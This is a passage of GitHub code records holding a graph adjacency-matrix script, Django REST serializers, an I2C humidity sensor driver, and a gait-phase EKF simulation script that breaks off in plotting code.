range(size)])\n self.size = size\n\n # Add edges\n def add_edge(self, v1, v2, weight):\n if v1 == v2:\n print(\"Same vertex %d and %d\" % (v1, v2))\n self.adjMatrix[v1][v2] = weight\n self.adjMatrix[v2][v1] = weight\n\n # Remove edges\n def remove_edge(self, v1, v2):\n if self.adjMatrix[v1][v2] == 0:\n print(\"No edge between %d and %d\" % (v1, v2))\n return\n self.adjMatrix[v1][v2] = 0\n self.adjMatrix[v2][v1] = 0\n\n def __len__(self):\n return self.size\n\n # Print the matrix\n def print_matrix(self):\n for row in self.adjMatrix:\n for val in row:\n print('{:4}'.format(val), end = ' ')\n print()\n\n def writeFile(self):\n ind = '0 '\n ind0 = '0 '\n for i in range(self.size):\n ind = ind + chr(ord('A') + i) + ' '\n ind0 = ind0 + '0 '\n \n #filename = \"\\\\datasets\\\\group\" + str(self.index+1) + \"\\\\represent\" + str(self.index) + '.txt'\n filename = \"\\\\datasets\\\\structure_fsm\\\\rep\" + str(self.index) + '.txt'\n path = str(Path(__file__).parent.parent) + filename\n print(path)\n f = open(path, 'w')\n f.write(ind0+'\\n')\n for row in self.adjMatrix:\n line = '0 '\n for val in row:\n line = line + str(val) + ' '\n print(line)\n f.write(line+'\\n')\n f.close()\n #f.write()\n\n\ndef createGraph(ithGraph):\n vnum = int(input(\"vertex num: \"))\n g = Graph(vnum, ithGraph)\n\n while True:\n inp = input(\"u v weight: \")\n if inp != 'z':\n a, b, weight = list(map(int, inp.split(' ')))\n \n #a, b = list(map(int, inp.split(' ')))\n #weight = float(input('weight: '))\n g.add_edge(a, b, weight)\n else:\n break\n g.print_matrix()\n g.writeFile()\n\n\n\nif __name__ == '__main__':\n repNum = int(input(\"Represent graph number: \" ))\n for i in range(repNum): \n print('='*60)\n createGraph(i)\n print('='*60)\n # writeFile()\n \n \n \n \n \n ","repo_name":"YYuJeong/Frequent-Subgraph-Mining-Using-Deep-Learning","sub_path":"create/createRepresentGraph.py","file_name":"createRepresentGraph.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40767849134","text":"from django.db import models\n\nfrom rest_framework.serializers import ModelSerializer, SerializerMethodField\n\nfrom smeta.models import Boq, BoqItem, Consumption, Resource, MaterialExtraInfo\n\n\nclass BoqModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from company.serializers import ProjectModelSerializer\n self.fields['project_object'] = ProjectModelSerializer(source='project', read_only=True)\n class Meta:\n model = Boq\n fields = '__all__'\n\n\nclass BoqItemModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from common.serializers import UnitModelSerializer\n self.fields['unit_object'] = UnitModelSerializer(source='unit', read_only=True)\n \n class Meta:\n model = BoqItem\n fields = '__all__'\n\n\nclass MaterialExtraInfoModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from common.serializers import CountryModelSerializer\n self.fields['country_object'] = CountryModelSerializer(source='country', read_only=True)\n \n class Meta:\n model = MaterialExtraInfo\n fields = '__all__'\n\n\nclass ResourceModelSerializer(ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n from common.serializers import UnitModelSerializer, CountryModelSerializer\n self.fields['unit_object'] = UnitModelSerializer(source='unit', 
read_only=True)\n        self.fields['country_object'] = CountryModelSerializer(source='country', read_only=True)\n    quantity = SerializerMethodField()\n    extra_infos = MaterialExtraInfoModelSerializer(many=True, read_only=True)\n    class Meta:\n        model = Resource\n        fields = '__all__'\n\n    def get_quantity(self, obj):\n        return obj.quantity\n\n\nclass ConsumptionModelSerializer(ModelSerializer):\n    boq_item_object = BoqItemModelSerializer(source='boq_item', read_only=True)\n    resource_object = ResourceModelSerializer(source='resource', read_only=True)\n    class Meta:\n        model = Consumption\n        fields = '__all__'","repo_name":"amanmyrats/smetcik","sub_path":"backend/smeta/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"36387977772","text":"import smbus2\nimport time\n\n\nclass PmodHygro:\n    \"\"\"class that defines procedures of Pmod HYGRO (relative humidity sensor with an integrated temperature sensor)\"\"\"\n\n    \n    # address variables\n    I2C_ADDR = 0x40    # unique 7-bit address of Pmod HYGRO device on the I2C bus \n    TMP_REG = 0x00     # temperature register address\n    HUM_REG = 0x01     # relative humidity register address\n    CONFIG_REG = 0x02  # configuration register address\n\n\n    def __init__(self):\n        \"\"\"initialize variables of sensor data\"\"\"\n        self.temperature = 0.0\n        self.humidity = 0.0\n        self.i2cbus = None\n        \n\n    def begin_i2c(self):\n        \"\"\"create i2c bus & update configuration register\"\"\"\n        self.i2cbus = smbus2.SMBus(1)  # create a new I2C bus\n        time.sleep(0.015)  # Wait 15ms\n        self.i2cbus.write_word_data(PmodHygro.I2C_ADDR, PmodHygro.CONFIG_REG, 0x00)  # use non-sequential acquisition mode, all other config bits are default\n\n\n    def get_temperature(self):\n        \"\"\"get data from temperature register & convert raw data to temperature(celsius)\"\"\"\n        self.i2cbus.write_byte(PmodHygro.I2C_ADDR, PmodHygro.TMP_REG)  # write temperature register pointer to talk\n        time.sleep(0.007)  # wait conversion time for temperature(at least 6.35ms at 14bit resolution)\n\n        # read 2 bytes from temperature register(2 byte)\n        temp_raw_front = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n        temp_raw_rear = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n        temp_raw_front = temp_raw_front << 8\n        temp_raw = temp_raw_front | temp_raw_rear\n\n        # convert raw data of sensors(provided in reference manual)\n        temp_raw /= 0x10000\n        self.temperature = temp_raw * 165.0 - 40.0\n\n        return self.temperature\n\n\n    def get_humidity(self):\n        \"\"\"get data from humidity register & convert raw data to relative humidity(%)\"\"\"\n        self.i2cbus.write_byte(PmodHygro.I2C_ADDR, PmodHygro.HUM_REG)  # write humidity register pointer to talk\n        time.sleep(0.007)  # wait conversion time for humidity(at least 6.5ms at 14bit resolution)\n\n        # read 2 bytes from humidity register(2 byte)\n        humidity_raw_front = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n        humidity_raw_rear = self.i2cbus.read_byte(PmodHygro.I2C_ADDR)\n        humidity_raw_front = humidity_raw_front << 8\n        humidity_raw = humidity_raw_front | humidity_raw_rear\n\n        # convert raw data of sensors(provided in reference manual)\n        humidity_raw /= 0x10000\n        self.humidity = humidity_raw * 100.0\n\n        return self.humidity\n\n\n    def get_temperature_f(self):\n        \"\"\"return fahrenheit temperature (°F)\"\"\"\n        # note: self.temperature holds the last Celsius reading (0.0 before any read),\n        # so fall back to a fresh measurement when none has been taken yet\n        if self.temperature:\n            return self.temperature * 1.8 + 32\n        else:\n            return self.get_temperature() * 1.8 + 32\n
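\n\nif __name__ == '__main__':\n    # Illustrative usage sketch (an addition, not part of the original driver);\n    # it assumes the Pmod HYGRO is wired to I2C bus 1 of the host board.\n    sensor = PmodHygro()\n    sensor.begin_i2c()\n    print('%.2f C / %.2f %%RH' % (sensor.get_temperature(), sensor.get_humidity()))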
\n","repo_name":"devpola/pmodhygro","sub_path":"pmodhygro/pmodhygro.py","file_name":"pmodhygro.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"72972258969","text":"\"\"\" Simulates the phase estimator EKF and TBE using loaded data. \"\"\"\nimport numpy as np\nfrom time import strftime\nnp.set_printoptions(precision=4)\nimport time\nimport gc\nimport sys\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom training_utils import phase_dist\n\n\nsys.path.append('/Users/leo/Documents/Research/Exo/ML Gait Estimation/ml-gait-estimation/')\nsys.path.append('/Users/leo/Documents/Research/Exo/ML Gait Estimation/ml-gait-estimation/utils')\nsys.path.append('/Users/leo/Documents/Research/Exo/ML Gait Estimation/ml-gait-estimation/old_ekf_funcs')\n\n\nfrom old_phase_ekf import PhaseEKF\nfrom arctanMapFuncs import *\nfrom heelphase_ekf import HeelPhaseEKF\nfrom gait_model import GaitModel_Fourier\nfrom ekf_torque_profile import TorqueProfile\nfrom measurement_noise_model import MeasurementNoiseModel\nfrom timing_based_estimator import TimingPhaseEstimator\nfrom filter_classes import FirstOrderLowPassLinearFilter, FirstOrderHighPassLinearFilter, GenericLinearFilter\nfrom attitudeEstimatorEKFFuncs import extractEulerAngles_new\nfrom heel_strike_detector import HeelStrikeDetector\n\nDO_KIDNAPPING =False\nDO_OVERRIDES = True\nUPDATE_OLS=True\nDO_TBE = True\nDO_NEW_HS_DETECTOR = True\nsideMultiplier = -1\n\nPLOT_EXO_IMU = False\nPLOT_TIMING_INFORMATION = False\nPLOT_MEASURED = True\nPLOT_AHRS = False\nSHOW_FULL_STATE = True\nPLOT_SIM_FOOT_POS = True\nUSE_C = not True\nSPOOF_SENSORS = False\n\nDO_GUARDRAILS = not True\n\n\ngc.disable()\n\n\ndef get_std(cov):\n \"\"\"Get square root of diagonals (standard deviations) from covariances \n \n Args:\n cov (np matrix): a stack (in the third dimension) of positive definite covariances\n \n Returns:\n stdevs (np matrix): an array of standard deviations\n \"\"\"\n \n d, d, N = cov.shape\n std_devs = np.zeros((N, d), dtype=float)\n for ii in range(N):\n std_devs[ii, :] = np.sqrt(np.diag(cov[:, :, ii]))\n return std_devs\n\n\ndef sim_other_models(data, SUBJECT_LEG_LENGTH, torque_profile_path, gait_model_covar_path, gait_model_path, DO_PLOTS=True):\n \"\"\"This function runs the TBE and EKF simulations over a set of exoboot data\n\n Args:\n data (np array): a np matrix containing the exoboot data\n SUBJECT_LEG_LENGTH (float): the participant leg length\n torque_profile_path (str): the path to the torque profile coefficients\n gait_model_covar_path (str): the path to the heteroscedastic model file\n gait_model_path (str): the path to the gait model coefficients\n DO_PLOTS (bool, optional): whether to plot results. 
Defaults to True.\n\n Returns:\n np arrays: the RMSEs for the gait states for the TBE and EKF simulations\n \"\"\" \n N_data = data.shape[0]\n # print(N_data)\n\n\n attitude_ekf_args = {'sigma_gyro':0.0023,\n 'sigma_accel': 0.0032,\n 'sigma_q_AE':1e2,\n 'Q_pos_scale':1e-10}\n\n #HETEROSCEDASTIC VELOCITY ON\n #stable\n # sigma_foot = 1\n # sigma_shank = 7\n\n # sigma_foot_vel = 10\n # sigma_shank_vel = 20\n\n # sigma_heel_pos_forward = 0.01 #m\n # sigma_heel_pos_up = 0.08 #m\n\n sigma_foot = 1\n sigma_shank = 7\n\n sigma_foot_vel = 10\n sigma_shank_vel = 20\n\n sigma_heel_pos_forward = 0.01 #m\n sigma_heel_pos_up = 0.08 #m\n\n meas_config = 'full'\n\n # #FULL\n R_meas = np.diag([sigma_foot**2,\n sigma_foot_vel**2,\\\n sigma_shank**2,\n sigma_shank_vel**2,\\\n sigma_heel_pos_forward**2, \n sigma_heel_pos_up**2,\n ])\n\n #STABLE\n # sigma_q_phase=0\n # sigma_q_phase_dot=6e-4\n # sigma_q_sL=9e-4\n # sigma_q_incline=6e-3\n\n sigma_q_phase=0\n sigma_q_phase_dot=1e-3\n sigma_q_sL=2e-3\n sigma_q_incline=5e-2\n \n torque_profile = TorqueProfile(torque_profile_path)\n gait_model = GaitModel_Fourier(gait_model_path,phase_order=20, stride_length_order=1, incline_order=1)\n\n\n measurement_noise_model = MeasurementNoiseModel(R_meas, gait_model_covar_path, meas_config=meas_config,DO_XSUB_R=True)\n phase_ekf_args = {'gait_model':gait_model,\n 'torque_profile':torque_profile,\n 'measurement_noise_model':measurement_noise_model,\n 'CANCEL_RAMP':False,\n 'BOOST_BANDWIDTH':False,\n 'sigma_q_phase':sigma_q_phase,\n 'sigma_q_phase_dot':sigma_q_phase_dot,\n 'sigma_q_sL':sigma_q_sL,\n 'sigma_q_incline':sigma_q_incline,\n 'DO_GUARDRAILS':DO_GUARDRAILS\n }\n\n phase_ekf = PhaseEKF(**phase_ekf_args)\n\n if DO_TBE:\n timing_based_estimator = TimingPhaseEstimator()\n else:\n timing_based_estimator = None\n\n\n #INITIALIZE BACKUP EKF\n #velocity het off\n # Q_HP = np.diag([5e-5,1e-3])\n # R_HP = phase_ekf.R_mean\n\n #Velocity het on\n Q_HP = np.diag([1e-4,5e-3])\n R_HP = phase_ekf.R_mean\n \n heelphase_ekf=HeelPhaseEKF(phase_ekf, Q_HP, R_HP, timing_based_estimator=timing_based_estimator)\n\n #set up the filters for the gyro and accel signals\n fc_gyro = 5\n gyroYLowPassFilter = FirstOrderLowPassLinearFilter(fc=fc_gyro,dt=1/100)\n\n fc_accel = 20\n accelZHighPassFilter = FirstOrderHighPassLinearFilter(fc=fc_accel,dt=1/100)\n\n \n #SET UP Filters\n ω = 0.5 * np.pi*2\n ζ= 0.9\n\n A = np.array([\n [0, 1 ] ,\n [-ω**2, -2*ω*ζ ]])\n\n # C = np.array([[-ω**2, -2*ω*ζ ]])\n C = np.array([[1, 0 ]])\n B = np.array([[0, 1]]).T\n # D = np.array([[1.0]])\n D = np.array([[0]])\n HPF_X0 = 0.0*np.ones((A.shape[0],1))\n\n heelPosForwardFilter = GenericLinearFilter(A, B, C, D, HPF_X0)\n\n\n ω = 0.5 * np.pi*2\n ζ= 0.9\n\n A = np.array([\n [0, 1 ] ,\n [-ω**2, -2*ω*ζ ]])\n\n # C = np.array([[-ω**2, -2*ω*ζ ]])\n C = np.array([[1, 0 ]])\n B = np.array([[0, 1]]).T\n # D = np.array([[1.0]])\n D = np.array([[0]])\n\n HPF_X0 = 0.0*np.ones((A.shape[0],1))\n heelPosUpFilter = GenericLinearFilter(A, B, C, D, HPF_X0)\n MAX_TIME_STEP_INTEGRATE = 0.06\n\n #set up HSDetector\n HS_analysis_window = 10\n HSDetector = HeelStrikeDetector(HS_analysis_window)\n\n plot_data = []\n plot_data_measured = []\n\n plot_data_timing_phase_ekf = []\n plot_data_TBE = []\n plot_data_HPEKF = []\n\n plot_states = []\n\n state_std_devs = []\n\n prev=0\n\n\n #INITIALIZE STORAGE FOR COVARS\n P_covars = np.zeros((4, 4, N_data))\n\n tic = time.time()\n\n timeSec_vec_hardware = data[:,0]\n heelAccForward_meas_fromDeltaVelocity_vec_hardware = data[:,33]\n 
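# columns 33-35 hold the heel accelerations recovered from the IMU delta-velocity\n    # signal (forward, side, up); their norm feeds the heel-strike detector below\n    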
heelAccSide_meas_fromDeltaVelocity_vec_hardware = data[:,34]\n heelAccUp_meas_fromDeltaVelocity_vec_hardware = data[:,35]\n\n heelAccNorm_meas_fromDeltaVelocity_vec_hardware = np.sqrt(heelAccForward_meas_fromDeltaVelocity_vec_hardware**2 +\n heelAccSide_meas_fromDeltaVelocity_vec_hardware**2 +\n (heelAccUp_meas_fromDeltaVelocity_vec_hardware)**2)\n\n for i,x in enumerate(data[:]):\n\n timeSec=x[0]\n dt = timeSec-prev\n\n prev=timeSec\n accelVec_corrected=x[1:4]\n gyroVec_corrected=x[4:7]\n shankAngle_meas = x[24]\n footAngle_meas = x[22]\n\n HSDetected_hardware = x[24]\n accelZ = accelVec_corrected[2]\n gyroY = gyroVec_corrected[1]\n shankAngleVel_meas = x[25]\n footAngleVel_meas = x[23]\n\n\n heelAccForward_meas_fromDeltaVelocity = x[33] #92\n heelAccSide_meas_fromDeltaVelocity = x[34] #70\n heelAccUp_meas_fromDeltaVelocity = x[35]#71\n\n heelAccForward_meas_norm = np.sqrt(heelAccForward_meas_fromDeltaVelocity**2 +\n heelAccSide_meas_fromDeltaVelocity**2 +\n (heelAccUp_meas_fromDeltaVelocity)**2)\n\n if DO_NEW_HS_DETECTOR:\n gyroY_filter = gyroYLowPassFilter.step(i, gyroY)\n accelZ_filter = accelZHighPassFilter.step(i, accelZ)\n HSDetected_sim = HSDetector.detectHS(timeSec, footAngle_meas, footAngleVel_meas, heelAccForward_meas_norm)\n\n else:\n HSDetected_sim = HSDetected_hardware\n\n \n\n phase_ekf.step(i,dt)\n\n if DO_KIDNAPPING and i % 1000 == 0 and i != 0:\n print(timeSec)\n temp_estimate = np.zeros(4)\n temp_estimate[0] = np.random.uniform(0,1)\n temp_estimate[1] = np.random.uniform(-1,1)\n temp_estimate[2] = np.random.uniform(-5,5)\n temp_estimate[3] = np.random.uniform(-10,10)\n phase_ekf.set_x_state_estimate(temp_estimate)\n\n \n dt_int = np.min([dt, MAX_TIME_STEP_INTEGRATE])\n states_heelPosForward, heelPosForward_meas_filt = heelPosForwardFilter.step(i, dt_int, heelAccForward_meas_fromDeltaVelocity)\n heelPosForward_meas_filt = heelPosForward_meas_filt[0,0]\n\n # heelPosForward_meas_filt = np.max([np.min([heelPosForward_meas_filt, 0.4]), -0.25])\n\n states_heelPosUp, heelPosUp_meas_filt = heelPosUpFilter.step(i, dt_int, heelAccUp_meas_fromDeltaVelocity)\n heelPosUp_meas_filt = heelPosUp_meas_filt[0,0]\n # heelPosUp_meas_filt = np.max([np.min([heelPosUp_meas_filt, 0.2]), -0.16])\n\n\n\n z_measured_sim = np.array([footAngle_meas, footAngleVel_meas, shankAngle_meas, shankAngleVel_meas, heelPosForward_meas_filt, heelPosUp_meas_filt])\n phase_ekf.update(i, dt, z_measured_sim)\n\n heelphase_ekf.step(i, timeSec, dt, z_measured_sim, HSDetected_sim, DO_OVERRIDES=DO_OVERRIDES)\n \n strideLength_update_descaled_sim = arctanMap(phase_ekf.x_state_update[2].item(0))\n\n #scale strideLength by subject height\n strideLength_update_descaled_sim = SUBJECT_LEG_LENGTH * strideLength_update_descaled_sim\n\n P_covars[:, :, i] = phase_ekf.P_covar_update\n arctanFromPos = np.arctan2(heelPosUp_meas_filt, heelPosForward_meas_filt) * 180/np.pi\n\n plot_data.append([\n timeSec, #0\n phase_ekf.x_state_update[0].item(0), #1\n phase_ekf.x_state_update[1].item(0), #2\n strideLength_update_descaled_sim, #3\n phase_ekf.x_state_update[3].item(0), #4\n phase_ekf.SSE, #5\n phase_ekf.get_torque(), #6\n HSDetected_sim, #7\n ])\n\n plot_data_timing_phase_ekf.append([\n timeSec,\n phase_ekf.timing_step,\n phase_ekf.timing_measure,\n phase_ekf.timing_update,\n phase_ekf.timing_gain_schedule_R])\n\n plot_data_measured.append([\n timeSec, #0\n phase_ekf.z_model[0].item(0),#1\n phase_ekf.z_model[1].item(0),#2\n phase_ekf.z_model[2].item(0),#3\n phase_ekf.z_model[3].item(0),#4\n phase_ekf.z_model[4].item(0),#5\n 
phase_ekf.z_model[5].item(0),#6\n z_measured_sim[0], #7\n z_measured_sim[1], #8\n z_measured_sim[2], #9\n z_measured_sim[3],#10\n z_measured_sim[4],#11\n z_measured_sim[5],#12\n phase_ekf.z_model[0].item(0) - 2*np.sqrt(phase_ekf.R[0,0]),#13\n phase_ekf.z_model[0].item(0) + 2*np.sqrt(phase_ekf.R[0,0]), #14\n phase_ekf.z_model[1].item(0) - 2*np.sqrt(phase_ekf.R[1,1]),#15\n phase_ekf.z_model[1].item(0) + 2*np.sqrt(phase_ekf.R[1,1]), #16\n phase_ekf.z_model[2].item(0) - 2*np.sqrt(phase_ekf.R[2,2]),#17\n phase_ekf.z_model[2].item(0) + 2*np.sqrt(phase_ekf.R[2,2]), #18\n phase_ekf.z_model[3].item(0) - 2*np.sqrt(phase_ekf.R[3,3]),#19\n phase_ekf.z_model[3].item(0) + 2*np.sqrt(phase_ekf.R[3,3]), #20\n phase_ekf.z_model[4].item(0) - 2*np.sqrt(phase_ekf.R[4,4]), #21\n phase_ekf.z_model[4].item(0) + 2*np.sqrt(phase_ekf.R[4,4]), #22\n phase_ekf.z_model[5].item(0) - 2*np.sqrt(phase_ekf.R[5,5]), #23\n phase_ekf.z_model[5].item(0) + 2*np.sqrt(phase_ekf.R[5,5]), #24\n arctanFromPos])\n\n plot_data_HPEKF.append([\n timeSec, \n heelphase_ekf.isOverriding,\\\n heelphase_ekf.phase_HP,\n heelphase_ekf.phase_rate_HP,\n SUBJECT_LEG_LENGTH * arctanMap(heelphase_ekf.x_state[0,0]),\n heelphase_ekf.x_state[1,0],\n heelphase_ekf.SSE\n ])\n\n state_std_devs.append([\n phase_ekf.x_state_update[0].item(0) - 2*np.sqrt(phase_ekf.P_covar_update[0,0]),#0\n phase_ekf.x_state_update[0].item(0) + 2*np.sqrt(phase_ekf.P_covar_update[0,0]),#1\n phase_ekf.x_state_update[1].item(0) - 2*np.sqrt(phase_ekf.P_covar_update[1,1]),#2\n phase_ekf.x_state_update[1].item(0) + 2*np.sqrt(phase_ekf.P_covar_update[1,1]),#3\n strideLength_update_descaled_sim - 2*np.sqrt(phase_ekf.P_covar_update[2,2]),#4\n strideLength_update_descaled_sim + 2*np.sqrt(phase_ekf.P_covar_update[2,2]),#5\n phase_ekf.x_state_update[3].item(0) - 2*np.sqrt(phase_ekf.P_covar_update[3,3]),#6\n phase_ekf.x_state_update[3].item(0) + 2*np.sqrt(phase_ekf.P_covar_update[3,3]),#7\n ])\n\n\n if DO_TBE:\n phase_estimate_TBE = timing_based_estimator.phase_estimate_TBE\n plot_data_TBE.append([\n timeSec, \n phase_estimate_TBE,\n timing_based_estimator.stepDuration,\n timing_based_estimator.timeStrideMean])\n\n toc = time.time()\n print(f\"Ran simulation loop in {toc - tic:0.4f} seconds\")\n\n plot_data = np.array(plot_data)\n\n plot_data_measured = np.array(plot_data_measured)\n plot_data_TBE = np.array(plot_data_TBE)\n plot_states = np.array(plot_states)\n plot_data_HPEKF = np.array(plot_data_HPEKF)\n\n state_std_devs = np.array(state_std_devs)\n\n # state_std_devs = get_std(P_covars)\n\n # print(plot_data_timing_heelphase)\n\n # print sampling rate\n\n print('Sampling Rate')\n sample_rate = 1/np.mean(np.diff(data[:,0]))\n print(sample_rate)\n\n\n \n if SHOW_FULL_STATE and DO_PLOTS:\n fig, axs = plt.subplots(5,1,sharex=True,figsize=(10,6))\n\n axs[0].plot(plot_data[:,0], plot_data[:,1],'b', label=r\"$phase_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,0], state_std_devs[:,1], color='blue', alpha=0.3)\n axs[0].plot(plot_data[:,0], state_std_devs[:,0],'b--')\n axs[0].plot(plot_data[:,0], state_std_devs[:,1],'b--')\n axs[0].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,2], label=r\"$phase_{hpekf}$\")\n\n if DO_TBE:\n axs[0].plot(plot_data[:,0], plot_data_TBE[:,1], label=r\"$phase_{TBE}$\") \n\n # axs[0].plot(timeSec_vec_hardware, HSDetected_vec_hardware, label=r\"$HSDetected, hardware$\")\n axs[0].plot(plot_data[:,0], plot_data[:,7],'k', label=r\"$HSDetected Sim$\")\n # axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1],'k', label=r\"$isOverriding sim$\")\n 
axs[0].legend()\n \n\n axs[1].plot(plot_data[:,0], plot_data[:,2],'b', label=r\"$phasedot_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,2], state_std_devs[:,3], color='blue', alpha=0.3)\n axs[1].plot(plot_data[:,0], state_std_devs[:,2],'b--')\n axs[1].plot(plot_data[:,0], state_std_devs[:,3],'b--')\n # axs[1].fill_between(plot_data[:,0], plot_data[:,6] - 1.96 * state_std_devs[:, 1], plot_data[:,6] + 1.96*state_std_devs[:, 1], color='blue', alpha=0.3)\n axs[1].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,3], label=r\"$phase rate_{hpekf}$\")\n axs[1].legend()\n axs[1].set_ylim([0,1.3])\n\n axs[2].plot(plot_data[:,0], plot_data[:,3],'b', label=r\"$Stride Length_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,4], state_std_devs[:,5], color='blue', alpha=0.3)\n # axs[2].plot(plot_data[:,0], state_std_devs[:,4],'b--')\n # axs[2].plot(plot_data[:,0], state_std_devs[:,5],'b--')\n # axs[2].fill_between(plot_data[:,0], plot_data[:,7] - 1.96 * state_std_devs[:, 2], plot_data[:,7] + 1.96*state_std_devs[:, 2], color='blue', alpha=0.3)\n axs[2].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,4], label=r\"$stride length_{hpekf}$\")\n\n # axs[2].plot(plot_data[:,0], HSDetected_vec_hardware, label=r\"$HSDetected, hardware$\"))\n # axs[2].plot(plot_data[:,0], plot_data[:,7],'k', label=r\"$isOverriding sim$\")\n # axs[2].plot(plot_data[:,0], plot_data[:,19], label=r\"$isOverriding old$\")\n axs[2].legend()\n\n axs[3].plot(plot_data[:,0], plot_data[:,4],'b', label=r\"$Ramp_{sim}$\")\n # axs[0].fill_between(plot_data[:,0], state_std_devs[:,6], state_std_devs[:,7], color='blue', alpha=0.3)\n axs[3].plot(plot_data[:,0], state_std_devs[:,6],'b--')\n axs[3].plot(plot_data[:,0], state_std_devs[:,7],'b--')\n # axs[3].fill_between(plot_data[:,0], plot_data[:,8] - 1.96 * state_std_devs[:, 3], plot_data[:,8] + 1.96*state_std_devs[:, 3], color='blue', alpha=0.3)\n\n axs[3].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,5], label=r\"$ramp_{hpekf}$\")\n\n # axs[3].plot(plot_data[:,0], HSDetected_vec_hardware*10, label=r\"$HSDetected$\")\n # axs[3].plot(plot_data[:,0], plot_data[:,7]*10,'k', label=r\"$isOverriding sim$\")\n # axs[3].plot(plot_data[:,0], plot_data[:,19], label=r\"$isOverriding old$\")\n axs[3].legend()\n axs[3].set_ylim([-14,14])\n\n axs[4].plot(plot_data_HPEKF[:,0], plot_data_HPEKF[:,6], label=r\"$SSE_{hpekf}$\")\n axs[4].plot(plot_data[:,0], plot_data[:,5], label=r\"$SSE_{sim}$\")\n # axs[4].plot(plot_data[:,0], HSDetected_vec_hardware*1e3, label=r\"$HSDetected$\")\n # axs[4].plot(plot_data[:,0], plot_data[:,7]*1e3,'k', label=r\"$isOverriding sim$\")\n # axs[4].plot(plot_data[:,0], plot_data[:,19], label=r\"$isOverriding old$\")\n\n axs[4].legend()\n\n axs[-1].set_xlabel(\"time (sec)\")\n print(\"this is done (show state)\")\n # plt.show()\n\n if PLOT_MEASURED and DO_PLOTS:\n\n fig, axs = plt.subplots(5,1,sharex=True,figsize=(10,6))\n\n # axs[0].plot(plot_data[:,0], plot_data[:,1], label=r\"$phase_{hardware}$\")\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,1], label=r\"$foot angle, model_{sim}$\")\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,7], label=r\"$foot angle, meas_{sim}$\")\n axs[0].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n # axs[0].plot(plot_data[:,0], HSDetected_vec_hardware*1e1, label=r\"$HSDetected hardware$\")\n axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n # axs[0].fill_between(plot_data_measured[:,0], 
plot_data_measured[:,16],plot_data_measured[:,17], alpha=.5)\n \n axs[0].legend()\n axs[0].set_ylim([-70,50])\n\n # axs[0].plot(plot_data[:,0], plot_data[:,1], label=r\"$phase_{hardware}$\")\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,2], label=r\"$foot angle vel, model_{sim}$\")\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,8], label=r\"$foot angle vel, meas_{sim}$\")\n axs[1].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[1].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n axs[1].legend()\n # axs[1].set_ylim([-500,500])\n\n # axs[1].plot(plot_data[:,0], plot_data[:,2], label=r\"$phasedot_{hardware}$\")\n axs[2].plot(plot_data_measured[:,0], plot_data_measured[:,3], label=r\"$shank angle, model_{sim}$\")\n axs[2].plot(plot_data_measured[:,0], plot_data_measured[:,9], label=r\"$shank angle, meas_{sim}$\")\n axs[2].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[2].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n # axs[2].fill_between(plot_data_measured[:,0], plot_data_measured[:,18],plot_data_measured[:,19], alpha=.5)\n axs[2].legend()\n axs[2].set_ylim([-70,50])\n\n axs[3].plot(plot_data_measured[:,0], plot_data_measured[:,4], label=r\"$shank angle vel, model_{sim}$\")\n axs[3].plot(plot_data_measured[:,0], plot_data_measured[:,10], label=r\"$shank angle vel, meas_{sim}$\")\n axs[3].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[3].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n axs[3].legend()\n # axs[3].set_ylim([-500,500])\n\n axs[4].plot(plot_data_measured[:,0], plot_data_measured[:,5], label=r\"$foot position, model_{sim}$\")\n axs[4].plot(plot_data_measured[:,0], plot_data_measured[:,11], label=r\"$foot position, meas_{sim}$\")\n axs[4].fill_between(plot_data_measured[:,0], plot_data_measured[:,21],plot_data_measured[:,22], alpha=.5)\n axs[4].plot(plot_data[:,0], plot_data[:,7]*1e-1, 'r', label=r\"$HSDetected Sim$\")\n # axs[4].plot(plot_data[:,0], HSDetected_vec_hardware*1e-1, label=r\"$HSDetected Hardware$\")\n axs[4].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n axs[4].legend()\n # axs[4].set_ylim([-0.5,0.5])\n\n print(\"this is done (plot measured)\")\n\n if PLOT_SIM_FOOT_POS and DO_PLOTS:\n fig, axs = 